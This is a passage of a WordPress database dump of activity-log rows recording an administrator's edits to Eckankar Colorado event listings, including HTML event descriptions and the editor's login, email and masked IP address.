Here'),(216417,35648,'duplicated_post_id','266311'),(216418,35648,'_message_key','post_duplicated'),(216419,35648,'_user_id','2'),(216420,35648,'_user_login','S8zhaBda'),(216421,35648,'_user_email','nada@zipnadanot.org'),(216422,35648,'_server_remote_addr','76.130.120.x'),(216423,35648,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&action2=-1&orderby=title&order=asc'),(216424,35649,'post_id','269147'),(216425,35649,'post_type','mec-events'),(216426,35649,'post_title','Sparkplug to Spiritual Growth'),(216427,35649,'post_new_thumb_id','265138'),(216428,35649,'post_new_thumb_title','rountable-notext-2021'),(216429,35649,'post_meta_added','77'),(216430,35649,'_message_key','post_updated'),(216431,35649,'_user_id','2'),(216432,35649,'_user_login','S8zhaBda'),(216433,35649,'_user_email','nada@zipnadanot.org'),(216434,35649,'_server_remote_addr','76.130.120.x'),(216435,35649,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269147'),(216436,35650,'post_id','269147'),(216437,35650,'post_type','mec-events'),(216438,35650,'post_title','Sparkplug to Spiritual Growth'),(216439,35650,'post_new_thumb_id','265138'),(216440,35650,'post_new_thumb_title','rountable-notext-2021'),(216441,35650,'post_meta_added','77'),(216442,35650,'_message_key','post_updated'),(216443,35650,'_user_id','2'),(216444,35650,'_user_login','S8zhaBda'),(216445,35650,'_user_email','nada@zipnadanot.org'),(216446,35650,'_server_remote_addr','76.130.120.x'),(216447,35650,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269147'),(216448,35651,'post_id','269147'),(216449,35651,'post_type','mec-events'),(216450,35651,'post_title','The Spiritual Law of Grace and Divine Love'),(216451,35651,'post_new_thumb_id','265138'),(216452,35651,'post_new_thumb_title','rountable-notext-2021'),(216453,35651,'post_meta_added','77'),(216454,35651,'_message_key','post_updated'),(216455,35651,'_user_id','2'),(216456,35651,'_user_login','S8zhaBda'),(216457,35651,'_user_email','nada@zipnadanot.org'),(216458,35651,'_server_remote_addr','76.130.120.x'),(216459,35651,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269147'),(216460,35652,'post_id','269147'),(216461,35652,'post_type','mec-events'),(216462,35652,'post_title','The Spiritual Law of Grace and Divine Love'),(216463,35652,'post_new_thumb_id','265138'),(216464,35652,'post_new_thumb_title','rountable-notext-2021'),(216465,35652,'post_meta_added','77'),(216466,35652,'_message_key','post_updated'),(216467,35652,'_user_id','2'),(216468,35652,'_user_login','S8zhaBda'),(216469,35652,'_user_email','nada@zipnadanot.org'),(216470,35652,'_server_remote_addr','76.130.120.x'),(216471,35652,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269147'),(216472,35653,'post_type','attachment'),(216473,35653,'attachment_id','269148'),(216474,35653,'attachment_title','maze-sunrise-1'),(216475,35653,'attachment_filename','maze-sunrise-1.jpg'),(216476,35653,'attachment_mime','image/jpeg'),(216477,35653,'attachment_filesize','184642'),(216478,35653,'attachment_parent_id','269147'),(216479,35653,'attachment_parent_title','The Spiritual Law of Grace and Divine Love'),(216480,35653,'attachment_parent_post_type','mec-events'),(216481,35653,'_message_key','attachment_created'),(216482,35653,'_user_id','2'),(216483,35653,'_user_login','S8zhaBda'),(216484,35653,'_user_email','nada@zipnadanot.org'),(216485,35653,'_server_remote_addr','76.130.120.x'),(216486,35653,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269147'),(216487,35654,'post_id','269147'),(216488,35654,'post_type','mec-events'),(216489,35654,'post_title','The Spiritual Law of Grace and Divine Love'),(216490,35654,'post_prev_post_name',''),(216491,35654,'post_new_post_name','the-spiritual-law-of-grace-and-divine-love'),(216492,35654,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\n</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(216493,35654,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Fifth Sunday this month, rather than the usual fourth Sunday</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216494,35654,'post_prev_post_status','draft'),(216495,35654,'post_new_post_status','publish'),(216496,35654,'post_prev_post_date','2023-10-02 14:22:11'),(216497,35654,'post_new_post_date','2023-10-02 14:25:19'),(216498,35654,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(216499,35654,'post_new_post_date_gmt','2023-10-02 20:25:19'),(216500,35654,'post_prev_thumb_id','265138'),(216501,35654,'post_prev_thumb_title','rountable-notext-2021'),(216502,35654,'post_new_thumb_id','269148'),(216503,35654,'post_new_thumb_title','maze-sunrise-1'),(216504,35654,'_message_key','post_updated'),(216505,35654,'_user_id','2'),(216506,35654,'_user_login','S8zhaBda'),(216507,35654,'_user_email','nada@zipnadanot.org'),(216508,35654,'_server_remote_addr','76.130.120.x'),(216509,35654,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269147'),(216510,35655,'post_id','269149'),(216511,35655,'post_type','mec-events'),(216512,35655,'post_title','Mystic World Discussion  &#8212; ONLINE TEMPLATE'),(216513,35655,'_message_key','post_updated'),(216514,35655,'_user_id','2'),(216515,35655,'_user_login','S8zhaBda'),(216516,35655,'_user_email','nada@zipnadanot.org'),(216517,35655,'_server_remote_addr','76.130.120.x'),(216518,35655,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&action2=-1&orderby=title&order=asc'),(216519,35656,'new_post_title','Mystic World Discussion  --- ONLINE TEMPLATE'),(216520,35656,'new_post_id','269149'),(216521,35656,'duplicated_post_title','Mystic World Discussion  --- ONLINE TEMPLATE'),(216522,35656,'duplicated_post_id','268425'),(216523,35656,'_message_key','post_duplicated'),(216524,35656,'_user_id','2'),(216525,35656,'_user_login','S8zhaBda'),(216526,35656,'_user_email','nada@zipnadanot.org'),(216527,35656,'_server_remote_addr','76.130.120.x'),(216528,35656,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&action2=-1&orderby=title&order=asc'),(216529,35657,'post_id','269149'),(216530,35657,'post_type','mec-events'),(216531,35657,'post_title','Mystic World Discussion  &#8212; ONLINE TEMPLATE'),(216532,35657,'post_prev_post_name',''),(216533,35657,'post_new_post_name','mystic-world-discussion-online-template-2'),(216534,35657,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\n<div>\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\n</div>\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\n</div>\n</div>\n</div>'),(216535,35657,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216536,35657,'post_prev_post_status','draft'),(216537,35657,'post_new_post_status','publish'),(216538,35657,'post_prev_post_date','2023-10-02 14:27:24'),(216539,35657,'post_new_post_date','2023-10-02 14:29:27'),(216540,35657,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(216541,35657,'post_new_post_date_gmt','2023-10-02 20:29:27'),(216542,35657,'post_prev_thumb_id','266472'),(216543,35657,'post_prev_thumb_title','misty-path-1'),(216544,35657,'post_new_thumb_id','268845'),(216545,35657,'post_new_thumb_title','rocks-balance-1'),(216546,35657,'_message_key','post_updated'),(216547,35657,'_user_id','2'),(216548,35657,'_user_login','S8zhaBda'),(216549,35657,'_user_email','nada@zipnadanot.org'),(216550,35657,'_server_remote_addr','76.130.120.x'),(216551,35657,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269149'),(216552,35658,'post_id','269149'),(216553,35658,'post_type','mec-events'),(216554,35658,'post_title','Mystic World Discussion'),(216555,35658,'post_prev_post_title','Mystic World Discussion  --- ONLINE TEMPLATE'),(216556,35658,'post_new_post_title','Mystic World Discussion'),(216557,35658,'_message_key','post_updated'),(216558,35658,'_user_id','2'),(216559,35658,'_user_login','S8zhaBda'),(216560,35658,'_user_email','nada@zipnadanot.org'),(216561,35658,'_server_remote_addr','76.130.120.x'),(216562,35658,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216563,35659,'post_id','269149'),(216564,35659,'post_type','mec-events'),(216565,35659,'post_title','Mystic World Discussion'),(216566,35659,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Members Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216567,35659,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216568,35659,'_message_key','post_updated'),(216569,35659,'_user_id','2'),(216570,35659,'_user_login','S8zhaBda'),(216571,35659,'_user_email','nada@zipnadanot.org'),(216572,35659,'_server_remote_addr','76.130.120.x'),(216573,35659,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216574,35660,'post_id','269149'),(216575,35660,'post_type','mec-events'),(216576,35660,'post_title','Mystic World Discussion'),(216577,35660,'_message_key','post_updated'),(216578,35660,'_user_id','2'),(216579,35660,'_user_login','S8zhaBda'),(216580,35660,'_user_email','nada@zipnadanot.org'),(216581,35660,'_server_remote_addr','76.130.120.x'),(216582,35660,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216583,35661,'post_id','269149'),(216584,35661,'post_type','mec-events'),(216585,35661,'post_title','Mystic World Discussion'),(216586,35661,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at the beginning of the month at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216587,35661,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216588,35661,'_message_key','post_updated'),(216589,35661,'_user_id','2'),(216590,35661,'_user_login','S8zhaBda'),(216591,35661,'_user_email','nada@zipnadanot.org'),(216592,35661,'_server_remote_addr','76.130.120.x'),(216593,35661,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216594,35662,'post_id','269149'),(216595,35662,'post_type','mec-events'),(216596,35662,'post_title','Mystic World Discussion'),(216597,35662,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a href=\"http://www.eckankar.org\">Eckankar.org</a></span></span><span class=\"\" style=\"font-size: 14pt;\">, in the Members Area under \"<em>Your Spiritual Studies</em>.\"&nbsp;</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216598,35662,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a href=\"http://www.eckankar.org\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216599,35662,'_message_key','post_updated'),(216600,35662,'_user_id','2'),(216601,35662,'_user_login','S8zhaBda'),(216602,35662,'_user_email','nada@zipnadanot.org'),(216603,35662,'_server_remote_addr','76.130.120.x'),(216604,35662,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269149&action=edit'),(216605,35663,'post_id','269149'),(216606,35663,'post_type','mec-events'),(216607,35663,'post_title','Mystic World Discussion'),(216608,35663,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a href=\"http://www.eckankar.org\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"></div>\r\n</div>\r\n</div>\r\n</div>'),(216609,35663,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">— This event is only for members of ECKANKAR in Colorado and Utah —</span></strong></p>\r\n<div><span class=\"\" style=\"font-size: 14pt;\">We are inviting all chelas to join us for a Zoom discussion of the <strong>December 2022</strong> and <strong>March 2023</strong> editions of the <em> Mystic&nbsp;</em> <em>World</em>. Please have your copies of both issues on hand at the meeting.</span></div>\r\n<div><span style=\"font-size: 14pt;\">&nbsp;</span></div>\r\n<div>\r\n<p class=\"\"><strong><span class=\"\" style=\"font-size: 14pt;\">Note that the <em>Mystic World </em>is available online at <a href=\"http://www.eckankar.org\">Eckankar.org</a> in the Members Area under \"<em>Your Spiritual Studies</em>.</span></strong></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #1d5791;\"><strong><span style=\"font-size: 16pt;\">You can find the login information for this event in the current issue of the Initiate Newsletter.</span></strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div 